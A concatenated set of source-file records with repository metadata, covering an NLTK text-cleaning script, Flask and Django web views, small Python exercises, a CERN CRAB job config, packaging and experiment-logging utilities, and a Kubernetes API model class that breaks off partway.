"umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f"
] | umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f | |
6fbc0d258e0586e2a8a11eadc79b68c6fd0decf4 | b2ccb163ea78887c32c9ce7e4513ae9db577e3cf | /Machine Learning A-Z/Part 7 - Natural Language Processing/Section 36 - Natural Language Processing/runstep3.py | 6a33dd541bda3329bc92aa552e7c08a366ff6589 | [] | no_license | Ukabix/machine-learning | f5966fec211d140e1297a2364789444f464a7caa | 0f80ff342cf186803320084bcc4a5e0e73d1fe8f | refs/heads/master | 2021-11-08T07:35:43.515249 | 2021-10-26T10:00:03 | 2021-10-26T10:00:03 | 213,165,560 | 0 | 0 | null | 2019-10-08T09:46:40 | 2019-10-06T12:36:05 | Python | UTF-8 | Python | false | false | 847 | py | # NLP - Bag of words
# Natural Language Processing
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Restaurant_Reviews.tsv', delimiter = '\t', quoting = 3) # tsv specific, quiting skips ""
# cleaning the texts
# stemming
import re
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
# import stemmer
from nltk.stem.porter import PorterStemmer
review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][0])
review = review.lower()
review = review.split()
# call stemmer
ps = PorterStemmer()
# update the loop
review = [ps.stem(word) for word in review if not word in stopwords.words('english')]
# for larger texts use below to create a set:
# review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
| [
"54454097+Ukabix@users.noreply.github.com"
] | 54454097+Ukabix@users.noreply.github.com |
eeb6e3d020373099a4465df961980ece301619ae | 11771f5dd90a74d5c76765f27f0d9a9cb044f57b | /route/user_setting_top_menu.py | b9016c93c76dfbf472686e9b9939945095559130 | [
"BSD-3-Clause"
] | permissive | openNAMU/openNAMU | cc031ea848ac6d829ad243fcf59da26adf0f0814 | 868107e4ef53e4e78af15c590673b78ee385baa5 | refs/heads/beta | 2023-08-24T10:20:00.245680 | 2023-08-23T14:09:53 | 2023-08-23T14:09:53 | 78,184,261 | 86 | 75 | BSD-3-Clause | 2023-09-13T21:36:03 | 2017-01-06T07:22:10 | Python | UTF-8 | Python | false | false | 2,222 | py | from .tool.func import *
def user_setting_top_menu():
with get_db_connect() as conn:
curs = conn.cursor()
ip = ip_check()
if ban_check(ip) == 1:
return re_error('/ban')
if flask.request.method == 'POST':
curs.execute(db_change("select name from other where name = 'top_menu'"))
if curs.fetchall():
curs.execute(db_change("update user_set set data = ? where name = 'top_menu' and id = ?"), [flask.request.form.get('content', ''), ip])
else:
curs.execute(db_change("insert into user_set (name, data, id) values ('top_menu', ?, ?)"), [flask.request.form.get('content', ''), ip])
conn.commit()
return redirect('/setting/top_menu')
else:
curs.execute(db_change("select data from user_set where name = 'top_menu' and id = ?"), [ip])
db_data = curs.fetchall()
db_data = db_data[0][0] if db_data else ''
return easy_minify(flask.render_template(skin_check(),
imp = [load_lang('user_added_menu'), wiki_set(), wiki_custom(), wiki_css([0, 0])],
data = '''
<span>
EX)
<br>
ONTS
<br>
https://2du.pythonanywhere.com/
<br>
FrontPage
<br>
/w/FrontPage
</span>
<hr class="main_hr">
''' + load_lang('not_support_skin_warning') + '''
<hr class="main_hr">
<form method="post">
<textarea class="opennamu_textarea_500" placeholder="''' + load_lang('enter_top_menu_setting') + '''" name="content" id="content">''' + html.escape(db_data) + '''</textarea>
<hr class="main_hr">
<button id="opennamu_save_button" type="submit">''' + load_lang('save') + '''</button>
</form>
''',
menu = [['setting', load_lang('return')]]
)) | [
"min08101@naver.com"
] | min08101@naver.com |
ff8d99be9ba8504e548a98344c65a23d7a5cdb13 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_172/ch35_2020_04_10_18_41_08_169350.py | ac2467fe93019c432612c8377d076ebdb0ddf1f0 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | x = int(input('numero: '))
soma = 0
y = True
while y:
if x != 0:
soma = soma + x
x = int(input('numero: '))
y = True
elif x == 0:
y = False
print (soma) | [
"you@example.com"
] | you@example.com |
f8f02a246f4d5c420abe71734d426e5f77389c3b | bb5b63774924abe86c2cb0d8a09795fcf1a4d822 | /chat/views.py | 0b613a45f48e1e833992141c24ab0fda3260f81c | [] | no_license | IdenTiclla/realtime_chat_app | 769bf432e993ee79cb93bd54489305db3526f4d5 | d2a5187bb9f257c5e8fefe6735d23e5d0eec64e6 | refs/heads/master | 2023-06-23T17:47:41.766605 | 2021-07-21T21:00:25 | 2021-07-21T21:00:25 | 387,920,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,343 | py | from typing import List
from django.shortcuts import render, redirect
from chat.models import Room, Message
from django.http import HttpResponse, JsonResponse
# Create your views here.
def home(request):
return render(request, 'home.html')
def room(request, room):
username = request.GET['username']
room_details = Room.objects.get(name=room)
return render(request, 'room.html', {'username': username, 'room_details': room_details, 'room': room})
def checkview(request):
room = request.POST['room_name']
username = request.POST['username']
if Room.objects.filter(name=room).exists():
return redirect('/'+room+'/?username=' + username)
else:
new_room = Room.objects.create(name=room)
new_room.save()
return redirect('/'+room+'/?username=' + username)
def send(request):
message = request.POST['message']
username = request.POST['username']
room_id = request.POST['room_id']
new_message = Message.objects.create(value=message, user=username, room=room_id)
new_message.save()
return HttpResponse('message sent successfully')
def getMessages(request, room):
room_details = Room.objects.get(name=room)
messages = Message.objects.filter(room=room_details.id)
return JsonResponse({
"messages": list(messages.values())
})
| [
"iden.ticlla@gmail.com"
] | iden.ticlla@gmail.com |
2728b2991bd08e88147fbdd4f649c902775aeb96 | 48c65330f577d11cedb29fd970aee35788ab72c6 | /ctrl_api_magento2_tierprice__upload.py | 49630511be6a3891ec8208159908d6b16d1bc9d4 | [] | no_license | yeboyebo/elganso_sync | 309ecbaba3127493abe001cd1704cc7098234baa | 66f033a0e27a05c1fc6704ec6ba2bd474d204b7e | refs/heads/master | 2023-07-22T00:17:48.201252 | 2023-07-19T07:48:40 | 2023-07-19T07:48:40 | 173,096,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | import json
from django.http import HttpResponse
from sync.tasks import task_manager
# @class_declaration interna_upload #
class interna_upload():
pass
# @class_declaration elganso_sync_upload #
from models.flsyncppal import flsyncppal_def as syncppal
class elganso_sync_upload(interna_upload):
@staticmethod
def start(pk, data):
result = None
status = None
if "passwd" in data and data["passwd"] == syncppal.iface.get_param_sincro('apipass')['auth']:
response = task_manager.task_executer("mg2_tierprice_upload", data)
result = response["data"]
status = response["status"]
else:
result = {"msg": "Autorización denegada"}
status = 401
return HttpResponse(json.dumps(result), status=status, content_type="application/json")
# @class_declaration upload #
class upload(elganso_sync_upload):
pass
| [
"jesus.yeboyebo@gmail.com"
] | jesus.yeboyebo@gmail.com |
d206f151b94adc10fe4c49e4dbcce4e98915b17d | b01f25b447d5ec3d6bc08380ae2601d5badb6af3 | /sortbypower.py | 915263174c405422441a673ddfc3037fb3ddf3eb | [] | no_license | SurajPatil314/Leetcode-problems | 0b05faab17214437a599d846dd1c9a7ea82b9c4c | 9201a87246842855281c90a9705f83fce24d1137 | refs/heads/master | 2021-09-05T02:20:05.274438 | 2021-08-09T21:24:05 | 2021-08-09T21:24:05 | 203,467,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | '''
The power of an integer x is defined as the number of steps needed to transform x into 1 using the following steps:
if x is even then x = x / 2
if x is odd then x = 3 * x + 1
For example, the power of x = 3 is 7 because 3 needs 7 steps to become 1 (3 --> 10 --> 5 --> 16 --> 8 --> 4 --> 2 --> 1).
Given three integers lo, hi and k. The task is to sort all integers in the interval [lo, hi] by the power value in ascending order, if two or more integers have the same power value sort them by ascending order.
Return the k-th integer in the range [lo, hi] sorted by the power value.
Notice that for any integer x (lo <= x <= hi) it is guaranteed that x will transform into 1 using these steps and that the power of x is will fit in 32 bit signed integer.
'''
class Solution:
def getKth(self, lo: int, hi: int, k: int) -> int:
if lo - hi == 0:
return lo
hmap = {}
for i in range(lo, hi + 1):
temp = i
steps = 0
while (temp != 1):
if temp % 2 == 1:
temp = temp * 3 + 1
steps += 1
else:
temp = temp / 2
steps += 1
hmap[i] = steps
sorted_hmap = sorted(hmap.items(), key=operator.itemgetter(1))
i1 = 0
for i2 in sorted_hmap:
if i1 == k - 1:
return i2[0]
i1 += 1
| [
"spatil2@umbc.edu"
] | spatil2@umbc.edu |
7e6bc2f7d0f3a1bc0d8311b35964e5b1f1bbad93 | cc632d66ccceb5f7bd739553cdb4054a0f1c0035 | /account/migrations/0001_initial.py | eee939a7d781d678f814c0532bd7e242beb8fde4 | [] | no_license | raimbaev223/django-by-example__bookmarks | b3b197c75906d0e49c495f5d8511517ddef62e08 | 59c4b35f5c739b824bd3e8073993a81b3a4e8845 | refs/heads/master | 2023-03-19T10:39:13.003427 | 2021-03-18T06:45:07 | 2021-03-18T06:45:07 | 347,860,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | # Generated by Django 3.1.7 on 2021-03-15 05:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_of_birth', models.DateField(blank=True, null=True)),
('photo', models.ImageField(blank=True, upload_to='users/%Y/%m/%d/')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"raimbaev.223@gmail.com"
] | raimbaev.223@gmail.com |
0765de0d02b8ed5de3c97d6966c417566f8a965b | 11bb0cbe6de2a0a4e94fc0ba610f61894d5593a1 | /VBS_Zgamma/RunII2018/Ntuples_2018/PKUTreeMaker/test/Zcrab/crab3_analysisZA.py | 6048c5a01d4c8023c1caecfb688a9c6e01a15f5d | [] | no_license | AnYpku/PKU-Cluster | 0dc4a88445aeb3ca239b2d7d7f796c6a67f3f69c | f9ffbcb7988053f4618fd015c1bb656d92ff51c6 | refs/heads/master | 2022-11-01T23:46:59.442037 | 2022-10-21T06:37:43 | 2022-10-21T06:37:43 | 188,202,345 | 0 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,183 | py | from WMCore.Configuration import Configuration
config = Configuration()
config.section_("General")
config.General.requestName = 'Z-ZA_smearing'
config.General.transferLogs = True
config.section_("JobType")
config.JobType.pluginName = 'Analysis'
config.JobType.inputFiles = ['Autumn18_V8_MC_L1FastJet_AK4PFchs.txt','Autumn18_V8_MC_L2Relative_AK4PFchs.txt','Autumn18_V8_MC_L3Absolute_AK4PFchs.txt','Autumn18_V8_MC_L1FastJet_AK4PFPuppi.txt','Autumn18_V8_MC_L2Relative_AK4PFPuppi.txt','Autumn18_V8_MC_L3Absolute_AK4PFPuppi.txt']
# Name of the CMSSW configuration file
config.JobType.psetName = 'Zanalysis.py'
config.JobType.allowUndistributedCMSSW = True
config.section_("Data")
config.Data.inputDataset = '/ZGToLLG_01J_5f_TuneCP5_13TeV-amcatnloFXFX-pythia8/RunIIAutumn18MiniAOD-102X_upgrade2018_realistic_v15_ext1-v2/MINIAODSIM'
config.Data.allowNonValidInputDataset = True
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 1
config.Data.totalUnits = -1
config.Data.publication = False
config.Data.outputDatasetTag = 'Z-ZA'
config.section_("Site")
#config.Site.storageSite = 'T2_CN_Beijing'
config.Site.storageSite = 'T3_US_FNALLPC'
| [
"ying.an@cern.ch"
] | ying.an@cern.ch |
be2c6b067ca851d5e4016d68def182a7dd5a0109 | 83b67a0800ceb5d5828c8e2011ff31b5faa311f8 | /experiments/save_exp.py | 47f9c2c3deb37a6f84566cdb9566403e8279cbbc | [] | no_license | xKHUNx/scatnet_learn | 77d89da4025f9c3cdbe74c957cf2a3e8626e3a01 | 9b2efbc9764118b58146950320215d33b6dc3240 | refs/heads/master | 2022-03-29T18:42:49.644481 | 2020-01-15T13:17:21 | 2020-01-15T13:17:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # Fergal Cotter
#
# Future modules
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import os
import time
import git
import shutil
TEMPLATE = """Invariant Layer Experiment
==========================
This experiment was run on {day} at {time}.
The command used to run the program was:
.. code::
{runcmd}
The repo commit used at running this command was::
{githash}
The numpy/pytorch random seed was::
{seed}
The number of learnable parameters is::
{num_params}
Description
-----------
"""
ACC_TEMPLATE = """
Best Result
-----------
The best acc was {best:.3f} and the last acc was {last:.3f}
"""
FOLD_TEMPLATE = """
Fold {k}: {best:.3f}"""
def get_githash(module):
try:
git_repo = git.Repo(module.__file__, search_parent_directories=True)
hash = str(git_repo.git.rev_parse('HEAD'))
except git.InvalidGitRepositoryError:
hash = "?"
return hash
def break_run_cmd(params):
cmd = 'python {file} {}'.format(' \n '.join(
params[1:]), file=params[0])
return cmd
def get_num_params(net):
n = 0
if net is None:
return '?'
else:
for p in net.parameters():
if p.requires_grad:
n += p.numel()
if n < 1e5:
s = '{:.2f}k'.format(n/1e3)
elif n < 1e6:
s = '{:.3f}M'.format(n/1e6)
elif n < 1e7:
s = '{:.2f}M'.format(n/1e6)
else:
s = '{:.1f}M'.format(n/1e6)
return s
def save_experiment_info(outdir, seed, no_comment=False, net=None):
""" Creates an experiment info file in the output directory
Args:
outdir: the output directory
net: the network object
Returns:
None
"""
file = os.path.join(outdir, 'INFO.rst')
with open(file, 'w') as f:
f.write(TEMPLATE.format(
day=time.strftime('%Y/%m/%d'),
time=time.strftime("%H-%M-%S", time.gmtime(time.time())),
runcmd='python {}'.format(' '.join(sys.argv)),
githash="?",
seed=seed,
num_params=get_num_params(net)
))
if 'debug' not in outdir and not no_comment:
os.system('vim + {file}'.format(file=file))
print('Saved info file. Copying source')
copytree(os.path.join(os.path.dirname(__file__), '..'), outdir)
def copytree(src, dst):
""" Copies all the python files in src to dst recursively"""
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
if not os.path.isdir(d):
os.mkdir(d)
copytree(s, d)
elif os.path.splitext(s)[1] == '.py':
if not os.path.exists(d):
shutil.copy2(s, d)
def save_acc(outdir, best, last):
""" Append the best accuracy to the info file"""
file = os.path.join(outdir, 'INFO.rst')
if os.path.exists(file):
with open(file, 'a') as f:
f.write(ACC_TEMPLATE.format(best=best, last=last))
def save_kfoldacc(outdir, fold, r2):
""" Append the best accuracy to the info file"""
file = os.path.join(outdir, 'INFO.rst')
if os.path.exists(file):
with open(file, 'a') as f:
if fold == 0:
f.write("\nKFOLD Results\n-------------")
f.write(FOLD_TEMPLATE.format(k=fold, best=r2))
| [
"fbcotter90@gmail.com"
] | fbcotter90@gmail.com |
6a1a1757829d687a4e590ec2ef37f100293e8521 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/380/usersdata/346/73642/submittedfiles/testes.py | 6e915ea2557ba3f2e24c9794f73162d52521c19f | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | n= int(input('Digite quantos lados deve ter o seu polígono: '))
nd= (n*(n-3))/2
print('%.1f' % nd)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
de06d49e0d61870db7688cf2ef395cb2ffcc3935 | 81026fb32d5fe66e291c824f8bb8e251d6ce56d5 | /04 Functions/using_math.py | 32fbfddf7efc078860cced164909527f9c0badc5 | [] | no_license | rifqirosyidi/coding-python | b1e148d1787d741cdc0ce2c36dd13ff6b8d2c17b | 0d98d55d0aaf2cca4129f1b98365a5866eb28dd2 | refs/heads/master | 2020-08-11T12:51:57.567318 | 2019-10-29T15:38:14 | 2019-10-29T15:38:14 | 214,567,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py | import math
def get_luas_bidang(value):
bidang = value.lower()
if bidang == "segitiga":
bidang_segitiga()
elif bidang == "segiempat":
bidang_segiempat()
elif bidang == "lingkaran":
bidang_lingkaran()
else:
print("Hanya Menangani Segitiga, Lingkaran dan Segiempat")
def bidang_segitiga():
alas = float(input("Masukkan Alas : "))
tinngi = float(input("Masukkan Tinggi : "))
luas = (0.5 * alas) * tinngi
print("Luas Segi Tiga : ", luas)
def bidang_segiempat():
lebar = float(input("Masukkan Lebar : "))
panjang = float(input("Masukkan Panjang : "))
luas = panjang * lebar
print("Luas Segi Empat : ", luas)
def bidang_lingkaran():
jari_jari = float(input("Masukkan Jari Jari Lingkaran : "))
luas = math.pi * math.pow(jari_jari, 2)
print("Luas Lingkaran : ", round(luas, 2))
def main():
bentuk_bidang = input("Masukkan Bidang Apa Yang Ingin di Hitung : ")
get_luas_bidang(bentuk_bidang)
main() | [
"rief.rosyidi@gmail.com"
] | rief.rosyidi@gmail.com |
0792882963b6c69117dab0d94d597d48eff39ae2 | be9e32a9182d16fe92d937f5965a2a3a3ec11dc8 | /bundler.py | b6d11c6deacf7a9dd8756f4b1a0058978e5e60df | [
"ISC"
] | permissive | theexiled1/CageTheUnicorn | 1a649f974298109d68e4af3401976855ddf98c83 | e695a2d9660eed3bdde4909f755c52d66beef7da | refs/heads/master | 2020-12-03T11:59:29.995881 | 2017-08-21T16:43:20 | 2017-08-21T16:43:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | import struct, sys
from glob import glob
def main(dumpdir, mainaddr, wkcaddr):
mainaddr = int(mainaddr.replace('0x', ''), 16)
wkcaddr = int(wkcaddr.replace('0x', ''), 16)
with file('membundle.bin', 'wb') as fp:
files = glob('%s/*.bin' % dumpdir)
fp.write(struct.pack('<IQQ', len(files), mainaddr, wkcaddr))
for fn in files:
addr = int(fn[11:].rsplit('/', 1)[-1].split(' ', 1)[0], 16)
end = int(fn[11:].rsplit('/', 1)[-1].split(' - ')[1], 16)
data = file(fn, 'rb').read()
print '%x size %x -- real %x' % (addr, end - addr, len(data))
if end - addr != len(data):
print 'MISMATCHED SIZE! CORRUPT DUMP'
raw_input()
fp.write(struct.pack('<QI', addr, len(data)))
fp.write(data)
if __name__=='__main__':
main(*sys.argv[1:])
| [
"cody.brocious@gmail.com"
] | cody.brocious@gmail.com |
8a555b206e436193b34566826633625c548602f5 | 4cdf99ed3fd91f2406fe908fff77284fbc2cd3c3 | /setup.py | 2c5bf3aad0abc71d2d5317b265460620b0199da7 | [
"MIT"
] | permissive | shinroo/mocr | cb4173d22413b9ba7e140118832e9ce6aac2da09 | 5d33a812172b87d126bf3f7de0238b0919c2ab86 | refs/heads/master | 2020-04-12T00:34:45.462919 | 2018-12-09T20:50:00 | 2018-12-09T20:50:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import os
import re
import codecs
from setuptools import setup, find_packages
cwd = os.path.abspath(os.path.dirname(__file__))
def read(filename):
with codecs.open(os.path.join(cwd, filename), 'rb', 'utf-8') as h:
return h.read()
metadata = read(os.path.join(cwd, 'mocr', '__init__.py'))
def extract_metaitem(meta):
meta_match = re.search(r"""^__{meta}__\s+=\s+['\"]([^'\"]*)['\"]""".format(meta=meta),
metadata, re.MULTILINE)
if meta_match:
return meta_match.group(1)
raise RuntimeError('Unable to find __{meta}__ string.'.format(meta=meta))
setup(
name='mocr',
version=extract_metaitem('version'),
license=extract_metaitem('license'),
description=extract_metaitem('description'),
long_description=(read('README.rst')),
author=extract_metaitem('author'),
author_email=extract_metaitem('email'),
maintainer=extract_metaitem('author'),
maintainer_email=extract_metaitem('email'),
url=extract_metaitem('url'),
download_url=extract_metaitem('download_url'),
packages=find_packages(exclude=('tests', 'docs')),
include_package_data=True,
platforms=['Any'],
install_requires=['opencv-python', 'opencv-contrib-python', 'pillow', 'pytesseract', 'imutils', 'numpy'],
setup_requires=['pytest-runner'],
tests_require=['pytest'],
keywords='ocr, optical character recognition, identity card, deep learning, opencv, meaningful',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
| [
"abdullahselek@gmail.com"
] | abdullahselek@gmail.com |
d2698bcccc58c5147cae9d2d59f3b99c7942463e | f7ed942c685bd0e77eb207b901ccae78b1844cfc | /three_sum.py | 4b5d927f83a2e27455519b1b6deaceb43c3a115e | [] | no_license | axu4github/leetcode.answers | beeeec30e2958a9fb5727fe1f77e5e919655becc | d2dd4a211a2c380f9816e0454c1a8c817545c1d7 | refs/heads/master | 2020-03-27T07:15:46.179010 | 2020-01-08T13:29:21 | 2020-01-08T13:29:21 | 146,176,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,538 | py | # coding=utf-8
class Solution(object):
"""
15. 三数之和
(https://leetcode-cn.com/problems/3sum/description/)
给定一个包含 n 个整数的数组 nums,
判断 nums 中是否存在三个元素 a,b,c ,
使得 a + b + c = 0 ?找出所有满足条件且不重复的三元组。
注意:答案中不可以包含重复的三元组。
例如, 给定数组 nums = [-1, 0, 1, 2, -1, -4],
满足要求的三元组集合为:
[
[-1, 0, 1],
[-1, -1, 2]
]
"""
def two_sum(self, nums, target):
all_res, _dict = [], {}
for i, one_num in enumerate(nums):
two_num = target - one_num
if two_num in _dict:
all_res.append([one_num, two_num])
else:
_dict[one_num] = i
return all_res
def threeSum(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
_dict, processed, nums = {}, {}, sorted(nums)
for i, num in enumerate(nums):
if num > 0 or num in processed:
continue
correct_nums = self.two_sum(nums[i + 1:], num * -1)
if len(correct_nums) > 0:
processed[num] = None
for correct_num in correct_nums:
correct = tuple(sorted(correct_num + [num]))
if correct not in _dict:
_dict[correct] = None
return map(lambda correct: list(correct), _dict.keys())
| [
"axu.home@gmail.com"
] | axu.home@gmail.com |
ee3d1185c32a04865b9ad8088059e235a5492772 | eee5fc5e9e1bd9ababc9cf8ccb8add19c9219ca3 | /ABC/151/d_bfs.py | 21951db67400789ba2fc6f7fa0e087d70d5afb84 | [] | no_license | matatabinoneko/Atcoder | 31aa0114bde28ab1cf528feb86d1e70d54622d84 | 07cc54894b5bcf9bcb43e57a67f2a0cbb2714867 | refs/heads/master | 2021-11-13T04:39:13.824438 | 2021-10-31T01:42:52 | 2021-10-31T01:42:52 | 196,823,857 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,664 | py | import queue
import copy
def main():
h,w = map(int,input().split())
maze = []
maze.append(['#' for i in range(w+2)])
for i in range(h):
tmp = input()
tmp = list('#' + tmp + '#')
maze.append(tmp)
maze.append(['#' for i in range(w+2)])
# print(maze)
dx_ = [0,1,0,-1]
dy_ = [1,0,-1,0]
ans = -1
q = queue.Queue()
for i in range(1,h+1):
for j in range(1,w+1):
new_maze = copy.deepcopy(maze)
dis = [[-1 for a in range(w+2)]for b in range(h+2)]
# for a in range(1,h):
# for b in range(1,w):
# dis[a][b] = -1
if new_maze[i][j]=='.':
dis[i][j]=0
q.put([i,j])
max_dis = -1
while(not q.empty()):
[x,y] = q.get()
new_maze[x][y]='#'
# print(x,y)
if max_dis < dis[x][y]:
max_dis = dis[x][y]
for dx,dy in zip(dx_,dy_):
# print(x+dx,y+dy)
if dis[x+dx][y+dy] == -1 and new_maze[x+dx][y+dy] != '#':
# new_maze[x+dx][y+dy] = '#'
dis[x+dx][y+dy] = dis[x][y]+1
q.put([x+dx,y+dy])
# print("put",x+dx,y+dy)
# for i in range(len(maze)):
# print(maze[i])
# print()
# print("max is",max_dis)
if ans < max_dis:
ans = max_dis
print(ans)
return 0
if __name__ == "__main__":
main() | [
"matatabinoneko0721@gmail.com"
] | matatabinoneko0721@gmail.com |
ae82513226f91ab38fa6ae76d5f8bc57af2d9873 | 6e47be4e22ab76a8ddd7e18c89f5dc4f18539744 | /venv/openshift/lib/python3.6/site-packages/kubernetes/client/models/v1_aws_elastic_block_store_volume_source.py | ef20d19c36e713bc035972b2b71b0b4bad61a1a5 | [] | no_license | georgi-mobi/redhat_ocp4.5_training | 21236bb19d04a469c95a8f135188d3d1ae473764 | 2ccaa90e40dbbf8a18f668a5a7b0d5bfaa1db225 | refs/heads/main | 2023-03-30T10:47:08.687074 | 2021-04-01T05:25:49 | 2021-04-01T05:25:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,378 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.11
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1AWSElasticBlockStoreVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'fs_type': 'str',
'partition': 'int',
'read_only': 'bool',
'volume_id': 'str'
}
attribute_map = {
'fs_type': 'fsType',
'partition': 'partition',
'read_only': 'readOnly',
'volume_id': 'volumeID'
}
def __init__(self, fs_type=None, partition=None, read_only=None, volume_id=None):
"""
V1AWSElasticBlockStoreVolumeSource - a model defined in Swagger
"""
self._fs_type = None
self._partition = None
self._read_only = None
self._volume_id = None
self.discriminator = None
if fs_type is not None:
self.fs_type = fs_type
if partition is not None:
self.partition = partition
if read_only is not None:
self.read_only = read_only
self.volume_id = volume_id
@property
def fs_type(self):
"""
Gets the fs_type of this V1AWSElasticBlockStoreVolumeSource.
Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: \"ext4\", \"xfs\", \"ntfs\". Implicitly inferred to be \"ext4\" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
:return: The fs_type of this V1AWSElasticBlockStoreVolumeSource.
:rtype: str
"""
return self._fs_type
@fs_type.setter
def fs_type(self, fs_type):
"""
Sets the fs_type of this V1AWSElasticBlockStoreVolumeSource.
Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: \"ext4\", \"xfs\", \"ntfs\". Implicitly inferred to be \"ext4\" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
:param fs_type: The fs_type of this V1AWSElasticBlockStoreVolumeSource.
:type: str
"""
self._fs_type = fs_type
@property
def partition(self):
"""
Gets the partition of this V1AWSElasticBlockStoreVolumeSource.
The partition in the volume that you want to mount. If omitted, the default is to mount by volume name. Examples: For volume /dev/sda1, you specify the partition as \"1\". Similarly, the volume partition for /dev/sda is \"0\" (or you can leave the property empty).
:return: The partition of this V1AWSElasticBlockStoreVolumeSource.
:rtype: int
"""
return self._partition
@partition.setter
def partition(self, partition):
"""
Sets the partition of this V1AWSElasticBlockStoreVolumeSource.
The partition in the volume that you want to mount. If omitted, the default is to mount by volume name. Examples: For volume /dev/sda1, you specify the partition as \"1\". Similarly, the volume partition for /dev/sda is \"0\" (or you can leave the property empty).
:param partition: The partition of this V1AWSElasticBlockStoreVolumeSource.
:type: int
"""
self._partition = partition
@property
def read_only(self):
"""
Gets the read_only of this V1AWSElasticBlockStoreVolumeSource.
Specify \"true\" to force and set the ReadOnly property in VolumeMounts to \"true\". If omitted, the default is \"false\". More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
:return: The read_only of this V1AWSElasticBlockStoreVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1AWSElasticBlockStoreVolumeSource.
Specify \"true\" to force and set the ReadOnly property in VolumeMounts to \"true\". If omitted, the default is \"false\". More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
:param read_only: The read_only of this V1AWSElasticBlockStoreVolumeSource.
:type: bool
"""
self._read_only = read_only
@property
def volume_id(self):
"""
Gets the volume_id of this V1AWSElasticBlockStoreVolumeSource.
Unique ID of the persistent disk resource in AWS (Amazon EBS volume). More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
:return: The volume_id of this V1AWSElasticBlockStoreVolumeSource.
:rtype: str
"""
return self._volume_id
@volume_id.setter
def volume_id(self, volume_id):
"""
Sets the volume_id of this V1AWSElasticBlockStoreVolumeSource.
Unique ID of the persistent disk resource in AWS (Amazon EBS volume). More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
:param volume_id: The volume_id of this V1AWSElasticBlockStoreVolumeSource.
:type: str
"""
if volume_id is None:
raise ValueError("Invalid value for `volume_id`, must not be `None`")
self._volume_id = volume_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
